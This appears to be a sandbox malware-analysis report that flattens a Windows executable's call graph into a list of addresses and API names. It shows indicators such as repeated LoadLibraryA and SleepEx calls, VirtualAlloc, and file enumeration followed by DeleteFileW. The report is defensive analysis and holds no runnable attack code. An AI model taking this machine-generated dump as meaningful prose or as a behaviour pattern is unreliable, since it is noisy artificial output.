14000682d 7591->7592 7593->7579 7595 140006244 __InternalCxxFrameHandler 45 API calls 7594->7595 7596 1400078f7 7595->7596 7682 140006724 7596->7682 7599 1400065c4 _CallSETranslator 45 API calls 7611 140007914 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7599->7611 7600 140007a14 7601 1400065c4 _CallSETranslator 45 API calls 7600->7601 7602 140007a19 7601->7602 7605 1400065c4 _CallSETranslator 45 API calls 7602->7605 7607 140007a24 7602->7607 7603 140007a4f 7604 14000994c __InternalCxxFrameHandler 36 API calls 7603->7604 7604->7607 7605->7607 7606 140007a31 __FrameHandler3::GetHandlerSearchState 7606->7582 7607->7606 7608 14000994c __InternalCxxFrameHandler 36 API calls 7607->7608 7609 140007a5a 7608->7609 7610 140006244 45 API calls __InternalCxxFrameHandler 7610->7611 7611->7600 7611->7603 7611->7610 7612 14000626c __FrameHandler3::FrameUnwindToState 45 API calls 7611->7612 7612->7611 7686 140005e68 7613->7686 7620 1400078c8 __FrameHandler3::FrameUnwindToState 45 API calls 7621 140005e58 7620->7621 7621->7582 7623 1400065c4 _CallSETranslator 45 API calls 7622->7623 7624 14000624d 7623->7624 7624->7574 7626 1400065c4 _CallSETranslator 45 API calls 7625->7626 7627 140006261 7626->7627 7627->7568 7700 140007a5c 7628->7700 7630 140006cec 7631 14000994c __InternalCxxFrameHandler 36 API calls 7630->7631 7642 140006fdc 7630->7642 7633 140007020 7631->7633 7632 140006cf1 7634 140006f99 7632->7634 7637 140006d24 7632->7637 7634->7630 7635 140006f97 7634->7635 7765 140007024 7634->7765 7636 1400065c4 _CallSETranslator 45 API calls 7635->7636 7636->7630 7640 140006eb6 7637->7640 7728 140005f34 7637->7728 7640->7635 7645 140006244 __InternalCxxFrameHandler 45 API calls 7640->7645 7649 140006ee3 7640->7649 7641 1400065c4 _CallSETranslator 45 API calls 7644 140006c5a 7641->7644 7642->7582 7644->7642 7646 1400065c4 _CallSETranslator 45 API calls 7644->7646 7645->7649 7648 140006c6a 7646->7648 7647 140006f0d 7647->7630 7647->7635 7651 140006f2e 7647->7651 7655 140006244 __InternalCxxFrameHandler 45 API calls 7647->7655 7650 1400065c4 _CallSETranslator 45 API calls 7648->7650 7649->7635 7649->7647 7757 140005dd8 7649->7757 7653 140006c73 7650->7653 7657 140007af4 IsInExceptionSpec 45 API calls 7651->7657 7712 140006284 7653->7712 7655->7651 7658 140006f45 7657->7658 7658->7635 7662 140005e68 _GetEstablisherFrame 37 API calls 7658->7662 7659 140006258 45 API calls __InternalCxxFrameHandler 7670 140006d45 7659->7670 7660 1400065c4 _CallSETranslator 45 API calls 7661 140006cb3 7660->7661 7661->7632 7664 1400065c4 _CallSETranslator 45 API calls 7661->7664 7663 140006f5f 7662->7663 7762 140006090 RtlUnwindEx 7663->7762 7666 140006cbf 7664->7666 7668 1400065c4 _CallSETranslator 45 API calls 7666->7668 7669 140006cc8 7668->7669 7715 140007af4 7669->7715 7670->7640 7670->7659 7734 140007254 7670->7734 7748 140006af0 7670->7748 7674 140006cdc 7724 140007bcc 7674->7724 7676 140006ce4 std::bad_alloc::bad_alloc __DestructExceptionObject 7676->7630 7783 140005b48 7676->7783 7679 140005ae6 __std_exception_destroy 7678->7679 7680 140005ab1 __std_exception_copy 7678->7680 7679->7588 7680->7679 7799 140009974 7680->7799 7683 140006746 7682->7683 7684 14000673b 7682->7684 7683->7599 7685 1400067c8 __InternalCxxFrameHandler 36 API calls 7684->7685 7685->7683 7687 1400067c0 __FrameHandler3::FrameUnwindToEmptyState 36 API calls 7686->7687 7690 140005e96 7687->7690 7688 140005e23 7691 1400067c0 7688->7691 7689 140005ebf RtlLookupFunctionEntry 7689->7690 7690->7688 7690->7689 7692 1400067c8 7691->7692 7693 14000994c __InternalCxxFrameHandler 36 API calls 7692->7693 7695 140005e31 7692->7695 7694 14000682d 7693->7694 7696 140005d80 7695->7696 7697 140005d97 7696->7697 7698 140005dbf 7697->7698 7699 1400065c4 _CallSETranslator 45 API calls 7697->7699 7698->7620 7699->7697 7701 1400067c0 __FrameHandler3::FrameUnwindToEmptyState 36 API calls 7700->7701 7702 140007a81 7701->7702 7703 140005e68 _GetEstablisherFrame 37 API calls 7702->7703 7704 140007a96 7703->7704 7788 14000674c 7704->7788 7707 140007acb 7708 14000674c __GetUnwindTryBlock 37 API calls 7707->7708 7710 140006c0e 7708->7710 7709 140007aa8 __FrameHandler3::GetHandlerSearchState 7791 140006784 7709->7791 7710->7630 7710->7632 7710->7641 7713 1400065c4 _CallSETranslator 45 API calls 7712->7713 7714 140006292 7713->7714 7714->7630 7714->7660 7716 140007bc4 7715->7716 7721 140007b1f 7715->7721 7717 14000994c __InternalCxxFrameHandler 36 API calls 7716->7717 7720 140007bc9 7717->7720 7718 140006cd8 7718->7632 7718->7674 7719 140006258 45 API calls __InternalCxxFrameHandler 7719->7721 7721->7718 7721->7719 7722 140006244 __InternalCxxFrameHandler 45 API calls 7721->7722 7723 140007254 TypeMatchHelper 45 API calls 7721->7723 7722->7721 7723->7721 7725 140007c42 7724->7725 7727 140007be9 Is_bad_exception_allowed 7724->7727 7725->7676 7726 140006244 45 API calls __InternalCxxFrameHandler 7726->7727 7727->7725 7727->7726 7729 1400067c0 __FrameHandler3::FrameUnwindToEmptyState 36 API calls 7728->7729 7730 140005f72 7729->7730 7731 140005f7e 7730->7731 7732 14000994c __InternalCxxFrameHandler 36 API calls 7730->7732 7731->7670 7733 14000608c 7732->7733 7735 14000727d 7734->7735 7738 140007286 7734->7738 7736 140006244 __InternalCxxFrameHandler 45 API calls 7735->7736 7736->7738 7737 140007314 7737->7670 7738->7737 7739 140006244 __InternalCxxFrameHandler 45 API calls 7738->7739 7740 1400072a7 7738->7740 7739->7740 7740->7737 7741 1400072d3 7740->7741 7742 140006244 __InternalCxxFrameHandler 45 API calls 7740->7742 7743 140006258 __InternalCxxFrameHandler 45 API calls 7741->7743 7742->7741 7744 1400072e7 7743->7744 7744->7737 7745 140007300 7744->7745 7746 140006244 __InternalCxxFrameHandler 45 API calls 7744->7746 7747 140006258 __InternalCxxFrameHandler 45 API calls 7745->7747 7746->7745 7747->7737 7749 140005e68 _GetEstablisherFrame 37 API calls 7748->7749 7750 140006b2d 7749->7750 7751 140006b53 7750->7751 7794 140006a30 7750->7794 7753 140006244 __InternalCxxFrameHandler 45 API calls 7751->7753 7754 140006b58 7753->7754 7755 140006090 __FrameHandler3::UnwindNestedFrames 9 API calls 7754->7755 7756 140006ba4 7755->7756 7756->7670 7758 1400067c0 __FrameHandler3::FrameUnwindToEmptyState 36 API calls 7757->7758 7759 140005dec 7758->7759 7760 140005d80 __FrameHandler3::CatchTryBlock 45 API calls 7759->7760 7761 140005df6 7760->7761 7761->7647 7763 14000fb50 __FrameHandler3::UnwindNestedFrames 8 API calls 7762->7763 7764 1400061a8 7763->7764 7764->7635 7766 140007231 7765->7766 7767 14000705d 7765->7767 7766->7635 7768 1400065c4 _CallSETranslator 45 API calls 7767->7768 7769 140007062 7768->7769 7770 140007079 EncodePointer 7769->7770 7779 1400070c7 7769->7779 7771 1400065c4 _CallSETranslator 45 API calls 7770->7771 7776 140007089 7771->7776 7772 1400070e3 7775 140005f34 pair 36 API calls 7772->7775 7773 14000724c 7774 14000994c __InternalCxxFrameHandler 36 API calls 7773->7774 7777 140007251 7774->7777 7782 140007103 7775->7782 7776->7779 7796 140005d2c 7776->7796 7779->7766 7779->7772 7779->7773 7780 140006af0 FindHandler 48 API calls 7780->7782 7781 140006244 45 API calls __InternalCxxFrameHandler 7781->7782 7782->7766 7782->7780 7782->7781 7784 140005b91 7783->7784 7785 140005bae RtlPcToFileHeader 7783->7785 7784->7785 7786 140005be1 RaiseException 7785->7786 7787 140005bd0 7785->7787 7786->7630 7787->7786 7789 140005e68 _GetEstablisherFrame 37 API calls 7788->7789 7790 14000675f 7789->7790 7790->7707 7790->7709 7792 140005e68 _GetEstablisherFrame 37 API calls 7791->7792 7793 14000679e 7792->7793 7793->7710 7795 140006a57 BuildCatchObjectHelperInternal 7794->7795 7797 1400065c4 _CallSETranslator 45 API calls 7796->7797 7798 140005d58 7797->7798 7798->7779 7800 140009981 7799->7800 7801 14000998b 7799->7801 7800->7801 7805 1400099a6 7800->7805 7802 140008544 _set_fmode 15 API calls 7801->7802 7803 140009992 7802->7803 7804 140008424 _invalid_parameter_noinfo 32 API calls 7803->7804 7806 14000999e 7804->7806 7805->7806 7807 140008544 _set_fmode 15 API calls 7805->7807 7806->7679 7807->7803 8098 14000511c 8099 140005147 8098->8099 8100 14000512b 8098->8100 8100->8099 8101 14000994c __InternalCxxFrameHandler 36 API calls 8100->8101 8102 140005153 8101->8102 8471 14000959c 8472 1400095cd 8471->8472 8473 1400095b5 8471->8473 8474 14000a08c __free_lconv_num 15 API calls 8472->8474 8473->8472 8475 14000a08c __free_lconv_num 15 API calls 8473->8475 8476 1400095e0 8474->8476 8475->8472 8477 14000a08c __free_lconv_num 15 API calls 8476->8477 8478 1400095f5 8477->8478 8479 14000a08c __free_lconv_num 15 API calls 8478->8479 8480 140009608 8479->8480 8481 14000a08c __free_lconv_num 15 API calls 8480->8481 8482 14000961b 8481->8482 7135 14001001f 7138 140007840 7135->7138 7139 140007862 7138->7139 7141 1400078ab 7138->7141 7140 1400065c4 _CallSETranslator 45 API calls 7139->7140 7139->7141 7140->7141 7808 140003ea0 7809 140003ead 7808->7809 7811 140003eb4 7808->7811 7810 140003ef6 7811->7810 7813 140004960 CreateEventW 7811->7813 7814 14000498a 7813->7814 7815 140004934 7813->7815 7816 140004f24 __scrt_fastfail 7 API calls 7814->7816 7817 140004a54 __scrt_initialize_onexit_tables 7 API calls 7815->7817 7818 140004995 7816->7818 7819 14000493b 7817->7819 7822 140004f24 __scrt_fastfail 7 API calls 7818->7822 7820 140004980 7819->7820 7821 140004940 7819->7821 7825 140004f24 __scrt_fastfail 7 API calls 7820->7825 7823 140004c68 pre_c_initialization 35 API calls 7821->7823 7824 1400049a0 DeleteCriticalSection 7822->7824 7826 14000494c 7823->7826 7827 1400049c1 CloseHandle 7824->7827 7828 1400049c7 7824->7828 7825->7814 7826->7810 7827->7828 7828->7810 8103 5ad965 8104 5abc65 LoadLibraryA 8103->8104 8105 5ada66 8104->8105 8106 5abc65 LoadLibraryA 8105->8106 8107 5ada7a 8106->8107 8108 5abc65 LoadLibraryA 8107->8108 8109 5ada91 8108->8109 8483 1400047a4 8484 140005a90 __std_exception_copy 32 API calls 8483->8484 8485 1400047d0 8484->8485 8110 5ab712 8111 5ab682 8110->8111 8112 5ae155 3 API calls 8111->8112 8112->8111 7829 14000e8ab 7830 14000e8eb 7829->7830 7831 14000eb50 7829->7831 7830->7831 7833 14000eb32 7830->7833 7834 14000e91f 7830->7834 7832 14000eb46 7831->7832 7836 14000f300 _log10_special 24 API calls 7831->7836 7837 14000f300 7833->7837 7836->7832 7840 14000f320 7837->7840 7841 14000f33a 7840->7841 7842 14000f31b 7841->7842 7844 14000f160 7841->7844 7842->7832 7845 14000f1a0 _ctrlfp _handle_error 7844->7845 7847 14000f20c _handle_error 7845->7847 7855 14000f690 7845->7855 7848 14000f249 7847->7848 7849 14000f219 7847->7849 7862 14000f9c0 7848->7862 7858 14000f03c 7849->7858 7852 14000f247 _ctrlfp 7853 14000fb50 __FrameHandler3::UnwindNestedFrames 8 API calls 7852->7853 7854 14000f271 7853->7854 7854->7842 7868 14000f6b8 7855->7868 7860 14000f080 _ctrlfp _handle_error 7858->7860 7859 14000f095 7859->7852 7860->7859 7861 14000f9c0 _set_errno_from_matherr 15 API calls 7860->7861 7861->7859 7863 14000f9c9 7862->7863 7864 14000f9de 7862->7864 7865 14000f9d6 7863->7865 7867 140008544 _set_fmode 15 API calls 7863->7867 7866 140008544 _set_fmode 15 API calls 7864->7866 7865->7852 7866->7865 7867->7865 7869 14000f6f7 _raise_exc _clrfp 7868->7869 7870 14000f90a RaiseException 7869->7870 7871 14000f6b2 7870->7871 7871->7847 7142 14000882c 7143 140008852 GetModuleHandleW 7142->7143 7144 14000889c 7142->7144 7143->7144 7149 14000885f 7143->7149 7160 14000a1d4 EnterCriticalSection 7144->7160 7149->7144 7155 1400089e4 GetModuleHandleExW 7149->7155 7156 140008a28 7155->7156 7157 140008a0e GetProcAddress 7155->7157 7158 140008a45 7156->7158 7159 140008a3f FreeLibrary 7156->7159 7157->7156 7158->7144 7159->7158 7161 14000a02c 7168 14000a444 7161->7168 7164 140009f8c _set_fmode 15 API calls 7165 14000a050 7164->7165 7167 14000a047 7165->7167 7173 14000a068 7165->7173 7169 14000a2a4 __vcrt_uninitialize_ptd 5 API calls 7168->7169 7170 14000a470 7169->7170 7171 14000a488 TlsAlloc 7170->7171 7172 14000a03c 7170->7172 7171->7172 7172->7164 7172->7167 7174 14000a07c 7173->7174 7175 14000a077 7173->7175 7174->7167 7177 14000a49c 7175->7177 7178 14000a2a4 __vcrt_uninitialize_ptd 5 API calls 7177->7178 7179 14000a4c7 7178->7179 7180 14000a4de TlsFree 7179->7180 7181 14000a4cf 7179->7181 7180->7181 7181->7174 7872 140004cac 7873 140004cbc pre_c_initialization 7872->7873 7889 140009810 7873->7889 7875 140004cc8 pre_c_initialization 7876 140004a54 __scrt_initialize_onexit_tables 7 API calls 7875->7876 7879 140004ce1 _RTC_Initialize 7876->7879 7877 140004f24 __scrt_fastfail 7 API calls 7878 140004d62 __scrt_initialize_default_local_stdio_options 7877->7878 7880 140004c68 pre_c_initialization 35 API calls 7879->7880 7887 140004d36 pre_c_initialization 7879->7887 7881 140004cf6 pre_c_initialization 7880->7881 7895 140008cd0 7881->7895 7887->7877 7888 140004d52 7887->7888 7890 140009821 7889->7890 7891 140008544 _set_fmode 15 API calls 7890->7891 7892 140009829 7890->7892 7893 140009838 7891->7893 7892->7875 7894 140008424 _invalid_parameter_noinfo 32 API calls 7893->7894 7894->7892 7896 140008d04 GetModuleFileNameW 7895->7896 7897 140008cee 7895->7897 7901 140008d31 pre_c_initialization 7896->7901 7898 140008544 _set_fmode 15 API calls 7897->7898 7899 140008cf3 7898->7899 7900 140008424 _invalid_parameter_noinfo 32 API calls 7899->7900 7902 140004d02 7900->7902 7917 140008c6c 7901->7917 7902->7887 7916 140005398 InitializeSListHead 7902->7916 7905 140008d79 7906 140008544 _set_fmode 15 API calls 7905->7906 7915 140008d7e 7906->7915 7907 140008d8a pre_c_initialization 7909 140008dd6 7907->7909 7910 140008def 7907->7910 7907->7915 7908 14000a08c __free_lconv_num 15 API calls 7908->7902 7911 14000a08c __free_lconv_num 15 API calls 7909->7911 7913 14000a08c __free_lconv_num 15 API calls 7910->7913 7912 140008ddf 7911->7912 7914 14000a08c __free_lconv_num 15 API calls 7912->7914 7913->7915 7914->7902 7915->7908 7918 140008c87 7917->7918 7919 140008c8b 7917->7919 7918->7905 7918->7907 7919->7918 7920 14000a888 pre_c_initialization 15 API calls 7919->7920 7921 140008cba 7920->7921 7922 14000a08c __free_lconv_num 15 API calls 7921->7922 7922->7918 7182 5ad615 7183 5ad682 7182->7183 7184 5abc65 LoadLibraryA 7183->7184 7185 5ad7b3 7184->7185 7186 5abc65 LoadLibraryA 7185->7186 7187 5ad7ca 7186->7187 7188 5abc65 LoadLibraryA 7187->7188 7189 5ad849 7188->7189 7190 14000ce30 7191 14000ce5a 7190->7191 7196 14000ce64 7190->7196 7191->7196 7202 140009a60 7191->7202 7197 14000cf21 MultiByteToWideChar 7197->7196 7199 14000cf0d 7197->7199 7198 14000ced0 7198->7199 7201 14000cee3 MultiByteToWideChar 7198->7201 7199->7196 7200 140008544 _set_fmode 15 API calls 7199->7200 7200->7196 7201->7196 7201->7199 7203 140009a7b 7202->7203 7204 140009a76 7202->7204 7203->7204 7205 140009ef8 pre_c_initialization 36 API calls 7203->7205 7204->7196 7210 14000dcc4 7204->7210 7206 140009a98 7205->7206 7213 14000cf80 7206->7213 7211 140009a60 36 API calls 7210->7211 7212 14000cec7 7211->7212 7212->7197 7212->7198 7214 14000cf95 7213->7214 7216 140009abc 7213->7216 7214->7216 7221 14000cd58 7214->7221 7217 14000cfb4 7216->7217 7218 14000cfc9 7217->7218 7219 14000cfdc 7217->7219 7218->7219 7233 14000b5fc 7218->7233 7219->7204 7222 140009ef8 pre_c_initialization 36 API calls 7221->7222 7223 14000cd67 7222->7223 7231 14000cdb9 7223->7231 7232 14000a1d4 EnterCriticalSection 7223->7232 7231->7216 7234 140009ef8 pre_c_initialization 36 API calls 7233->7234 7235 14000b60b 7234->7235 7236 14000b626 7235->7236 7244 14000a1d4 EnterCriticalSection 7235->7244 7238 14000b6ac 7236->7238 7241 1400099d4 abort 36 API calls 7236->7241 7238->7219 7241->7238 8113 5ac115 8114 5abe55 LoadLibraryA 8113->8114 8115 5ac1d0 8114->8115 8116 5abe55 LoadLibraryA 8115->8116 8117 5ac1e1 8116->8117 8118 5abe55 LoadLibraryA 8117->8118 8119 5ac1f2 8118->8119 8120 5abc65 LoadLibraryA 8119->8120 8121 5ac285 8120->8121 8122 140009530 8125 14000902c 8122->8125 8132 140008ff4 8125->8132 8130 140008fb0 15 API calls 8131 140009054 8130->8131 8133 140009004 8132->8133 8134 140009009 8132->8134 8135 140008fb0 15 API calls 8133->8135 8136 140009010 8134->8136 8135->8134 8137 140009025 8136->8137 8138 140009020 8136->8138 8137->8130 8139 140008fb0 15 API calls 8138->8139 8139->8137 8140 14000d130 8150 14000dbd4 8140->8150 8151 14000dbe0 8150->8151 8173 14000a1d4 EnterCriticalSection 8151->8173 7923 140004eb8 7926 1400050b8 GetModuleHandleW 7923->7926 7925 140004ebf abort 7927 1400050c9 7926->7927 7927->7925 7928 1400100bc 7931 140005cd4 7928->7931 7932 140005ce3 7931->7932 7933 140005cf5 7931->7933 7932->7933 7934 140005ceb 7932->7934 7935 1400065c4 _CallSETranslator 45 API calls 7933->7935 7937 1400065c4 _CallSETranslator 45 API calls 7934->7937 7940 140005cf3 7934->7940 7936 140005cfa 7935->7936 7938 1400065c4 _CallSETranslator 45 API calls 7936->7938 7936->7940 7939 140005d14 7937->7939 7938->7940 7941 14000994c __InternalCxxFrameHandler 36 API calls 7939->7941 7942 140005d1d 7941->7942 7943 14000994c __InternalCxxFrameHandler 36 API calls 7942->7943 7944 140005d29 7943->7944 7245 14000103e 7247 1400010e5 7245->7247 7246 1400010ef 7247->7246 7248 140003a96 VirtualAlloc 7247->7248 7249 1400035ab 7248->7249 6737 5ac685 6738 5abc65 LoadLibraryA 6737->6738 6739 5ac6f7 6738->6739 6740 5abc65 LoadLibraryA 6739->6740 6741 5ac756 SleepEx 6740->6741 6743 5ac780 6741->6743 8486 1400101c1 8487 1400101d3 8486->8487 8488 1400101dd 8486->8488 8490 14000a228 LeaveCriticalSection 8487->8490 7250 140010044 7259 1400061f0 7250->7259 7252 1400065c4 _CallSETranslator 45 API calls 7253 14001009c 7252->7253 7254 1400065c4 _CallSETranslator 45 API calls 7253->7254 7256 1400100ac 7254->7256 7258 140010088 __DestructExceptionObject 7258->7252 7260 1400065c4 _CallSETranslator 45 API calls 7259->7260 7261 140006202 7260->7261 7262 14000623d 7261->7262 7264 1400065c4 _CallSETranslator 45 API calls 7261->7264 7263 14000994c __InternalCxxFrameHandler 36 API calls 7262->7263 7265 140006242 7263->7265 7266 14000620d 7264->7266 7266->7262 7267 140006226 7266->7267 7268 1400065c4 _CallSETranslator 45 API calls 7267->7268 7269 14000622b 7268->7269 7269->7258 7270 140005c80 7269->7270 7271 1400065c4 _CallSETranslator 45 API calls 7270->7271 7272 140005c8e 7271->7272 7272->7258 7273 14000a844 7274 14000a87d 7273->7274 7276 14000a84e 7273->7276 7275 14000a863 FreeLibrary 7275->7276 7276->7274 7276->7275 7277 140004844 InitializeCriticalSectionAndSpinCount GetModuleHandleW 7278 140004886 GetModuleHandleW 7277->7278 7279 1400048a0 GetProcAddress GetProcAddress GetProcAddress 7277->7279 7278->7279 7289 140004995 7278->7289 7280 1400048e1 7279->7280 7281 14000495f CreateEventW 7279->7281 7280->7281 7283 1400048eb 7280->7283 7281->7283 7296 14000498a 7281->7296 7282 140004f24 __scrt_fastfail 7 API calls 7284 1400049a0 DeleteCriticalSection 7282->7284 7297 140004a54 7283->7297 7287 1400049c1 CloseHandle 7284->7287 7288 1400049c7 7284->7288 7285 140004f24 __scrt_fastfail 7 API calls 7285->7289 7287->7288 7289->7282 7290 14000493b 7291 140004980 7290->7291 7292 140004940 7290->7292 7305 140004f24 IsProcessorFeaturePresent 7291->7305 7302 140004c68 7292->7302 7296->7285 7298 140004a69 7297->7298 7301 140004a72 __scrt_initialize_onexit_tables __scrt_release_startup_lock 7297->7301 7299 140004f24 __scrt_fastfail 7 API calls 7298->7299 7298->7301 7300 140004b2b 7299->7300 7301->7290 7312 140004c18 7302->7312 7304 14000494c 7306 140004f49 __scrt_fastfail __scrt_get_show_window_mode 7305->7306 7307 140004f68 RtlCaptureContext RtlLookupFunctionEntry 7306->7307 7308 140004f91 RtlVirtualUnwind 7307->7308 7309 140004fcd __scrt_get_show_window_mode 7307->7309 7308->7309 7310 140004fff IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7309->7310 7311 140005051 __scrt_fastfail 7310->7311 7311->7296 7313 140004c47 7312->7313 7315 140004c3d _onexit 7312->7315 7316 1400094b0 7313->7316 7315->7304 7319 14000906c 7316->7319 7326 14000a1d4 EnterCriticalSection 7319->7326 7327 140008e44 7328 140008e5d 7327->7328 7335 140008e59 7327->7335 7337 14000b9f4 GetEnvironmentStringsW 7328->7337 7331 140008e6a 7333 14000a08c __free_lconv_num 15 API calls 7331->7333 7333->7335 7336 14000a08c __free_lconv_num 15 API calls 7336->7331 7338 140008e62 7337->7338 7339 14000ba18 7337->7339 7338->7331 7344 140008eac 7338->7344 7339->7339 7340 14000a244 _onexit 16 API calls 7339->7340 7341 14000ba4a 7340->7341 7342 14000a08c __free_lconv_num 15 API calls 7341->7342 7343 14000ba6a VirtualAlloc 7342->7343 7343->7338 7345 140008ecd 7344->7345 7346 14000a888 pre_c_initialization 15 API calls 7345->7346 7347 140008f01 7346->7347 7350 14000a888 pre_c_initialization 15 API calls 7347->7350 7351 140008f65 7347->7351 7355 140008f9c 7347->7355 7358 14000a08c __free_lconv_num 15 API calls 7347->7358 7359 140008f74 7347->7359 7361 14000b98c 7347->7361 7348 14000a08c __free_lconv_num 15 API calls 7349 140008e77 7348->7349 7349->7336 7350->7347 7370 140008fb0 7351->7370 7357 140008444 _invalid_parameter_noinfo 17 API calls 7355->7357 7356 14000a08c __free_lconv_num 15 API calls 7356->7359 7360 140008fae 7357->7360 7358->7347 7359->7348 7362 14000b9a3 7361->7362 7363 14000b999 7361->7363 7364 140008544 _set_fmode 15 API calls 7362->7364 7363->7362 7366 14000b9bf 7363->7366 7365 14000b9ab 7364->7365 7367 140008424 _invalid_parameter_noinfo 32 API calls 7365->7367 7368 14000b9b7 7366->7368 7369 140008544 _set_fmode 15 API calls 7366->7369 7367->7368 7368->7347 7369->7365 7371 140008f6d 7370->7371 7372 140008fb5 7370->7372 7371->7356 7373 140008fde 7372->7373 7375 14000a08c __free_lconv_num 15 API calls 7372->7375 7374 14000a08c __free_lconv_num 15 API calls 7373->7374 7374->7371 7375->7372 8175 14000774e 8176 1400065c4 _CallSETranslator 45 API calls 8175->8176 8178 14000775b __DestructExceptionObject 8176->8178 8177 14000779f RaiseException 8179 1400077c6 8177->8179 8178->8177 8180 1400061f0 __CxxCallCatchBlock 45 API calls 8179->8180 8185 1400077ce 8180->8185 8181 1400077f7 __DestructExceptionObject 8182 1400065c4 _CallSETranslator 45 API calls 8181->8182 8183 14000780a 8182->8183 8184 1400065c4 _CallSETranslator 45 API calls 8183->8184 8186 140007813 8184->8186 8185->8181 8187 140005c80 __CxxCallCatchBlock 45 API calls 8185->8187 8187->8181 7945 5b20b5 7946 5abc65 LoadLibraryA 7945->7946 7947 5b212c 7946->7947 7948 5b1e95 LoadLibraryA 7947->7948 7949 5b2136 7948->7949 8188 5adb35 8189 5abc65 LoadLibraryA 8188->8189 8190 5adbe6 8189->8190 8191 5abc65 LoadLibraryA 8190->8191 8192 5adc98 8191->8192 8193 5abc65 LoadLibraryA 8192->8193 8194 5adcee 8192->8194 8193->8194 8491 5addb5 8492 5ade0f 8491->8492 8493 5abc65 LoadLibraryA 8492->8493 8494 5ade87 8493->8494 7950 1400100d2 7951 1400065c4 _CallSETranslator 45 API calls 7950->7951 7952 1400100e0 7951->7952 7953 1400100eb 7952->7953 7954 1400065c4 _CallSETranslator 45 API calls 7952->7954 7954->7953 7955 140003cd3 7956 140003ce2 7955->7956 7969 140003a00 7956->7969 7959 140003d22 7962 140003d26 7959->7962 7964 140003d77 7959->7964 7960 140003e13 7963 140003d55 7960->7963 7987 1400042d0 StrCpyW 7960->7987 7962->7963 7965 140004960 45 API calls 7962->7965 7964->7963 7973 140004150 7964->7973 7967 140003d43 7965->7967 7970 140003a09 7969->7970 7971 14000f320 _log10_special 24 API calls 7970->7971 7972 140003a12 7971->7972 7972->7959 7972->7960 7974 140004161 StrCpyW PathAppendW LoadLibraryW 7973->7974 7975 140003dcb 7973->7975 7976 1400042df FindNextFileW 7974->7976 7977 1400041af GetProcAddress GetProcAddress GetProcAddress 7974->7977 7976->7974 7978 1400042fa FindClose FindFirstFileW 7976->7978 7986 1400041fc 7977->7986 7978->7975 7979 140004324 StrCmpIW 7978->7979 7982 140004367 FindNextFileW 7979->7982 7983 140004338 StrCpyW PathAppendW DeleteFileW 7979->7983 7980 140004297 FreeLibrary 7980->7976 7980->7986 7981 14000420a GetProcessHeap HeapAlloc 7981->7986 7982->7979 7984 14000437b FindClose StrCpyW StrCpyW PathAppendW 7982->7984 7983->7982 7984->7975 7985 14000427e GetProcessHeap HeapFree 7985->7980 7986->7975 7986->7976 7986->7980 7986->7981 7986->7985 7988 1400042df FindNextFileW 7987->7988 7989 140004161 StrCpyW PathAppendW LoadLibraryW 7988->7989 7990 1400042fa FindClose FindFirstFileW 7988->7990 7989->7988 7991 1400041af GetProcAddress GetProcAddress GetProcAddress 7989->7991 7992 140004324 StrCmpIW 7990->7992 8000 1400042c9 7990->8000 7998 1400041fc 7991->7998 7993 140004367 FindNextFileW 7992->7993 7994 140004338 StrCpyW PathAppendW DeleteFileW 7992->7994 7993->7992 7995 14000437b FindClose StrCpyW StrCpyW PathAppendW 7993->7995 7994->7993 7995->8000 7996 140004297 FreeLibrary 7996->7988 7996->7998 7997 14000420a GetProcessHeap HeapAlloc 7997->7998 7998->7988 7998->7996 7998->7997 7999 14000427e GetProcessHeap HeapFree 7998->7999 7998->8000 7999->7996 8000->7963 7376 140007654 7377 1400065c4 _CallSETranslator 45 API calls 7376->7377 7378 140007689 7377->7378 7379 1400065c4 _CallSETranslator 45 API calls 7378->7379 7380 140007697 __except_validate_context_record 7379->7380 7381 1400065c4 _CallSETranslator 45 API calls 7380->7381 7382 1400076db 7381->7382 7383 1400065c4 _CallSETranslator 45 API calls 7382->7383 7384 1400076e4 7383->7384 7385 1400065c4 _CallSETranslator 45 API calls 7384->7385 7386 1400076ed 7385->7386 7399 1400061b4 7386->7399 7389 1400065c4 _CallSETranslator 45 API calls 7390 14000771d __CxxCallCatchBlock 7389->7390 7391 1400061f0 __CxxCallCatchBlock 45 API calls 7390->7391 7396 1400077ce 7391->7396 7392 1400077f7 __DestructExceptionObject 7393 1400065c4 _CallSETranslator 45 API calls 7392->7393 7394 14000780a 7393->7394 7395 1400065c4 _CallSETranslator 45 API calls 7394->7395 7397 140007813 7395->7397 7396->7392 7398 140005c80 __CxxCallCatchBlock 45 API calls 7396->7398 7398->7392 7400 1400065c4 _CallSETranslator 45 API calls 7399->7400 7401 1400061c5 7400->7401 7402 1400061d0 7401->7402 7403 1400065c4 _CallSETranslator 45 API calls 7401->7403 7404 1400065c4 _CallSETranslator 45 API calls 7402->7404 7403->7402 7405 1400061e1 7404->7405 7405->7389 7405->7390 8001 14000bcd8 8002 14000bce4 8001->8002 8004 14000bd0b 8002->8004 8005 14000c2ac 8002->8005 8006 14000c2b1 8005->8006 8007 14000c2ec 8005->8007 8008 14000c2d2 DeleteCriticalSection 8006->8008 8009 14000c2e4 8006->8009 8007->8002 8008->8008 8008->8009 8010 14000a08c __free_lconv_num 15 API calls 8009->8010 8010->8007 8195 14000ff58 8198 140008690 8195->8198 8199 140009f8c _set_fmode 15 API calls 8198->8199 8200 1400086ae 8199->8200 7406 14000985c 7407 140009872 7406->7407 7408 14000989d 7406->7408 7414 14000a1d4 EnterCriticalSection 7407->7414 6744 5ad525 6745 5abc65 LoadLibraryA 6744->6745 6746 5ad597 6745->6746 6747 5ad5d3 6746->6747 6748 5ad5c5 SleepEx 6746->6748 6748->6746 8201 140008960 8202 14000994c __InternalCxxFrameHandler 36 API calls 8201->8202 8203 140008965 8202->8203 8208 14000a228 LeaveCriticalSection 8203->8208

                                      Executed Functions

                                      Function 005AD895 Relevance: 45.5, APIs: 1, Strings: 25, Instructions: 49COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 48 5ad895-5ad94f call 5abc65 GetSystemInfo 51 5ad951-5ad953 48->51 52 5ad955 48->52 53 5ad95a-5ad961 51->53 52->53
                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • GetSystemInfo.KERNELBASE ref: 005AD940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
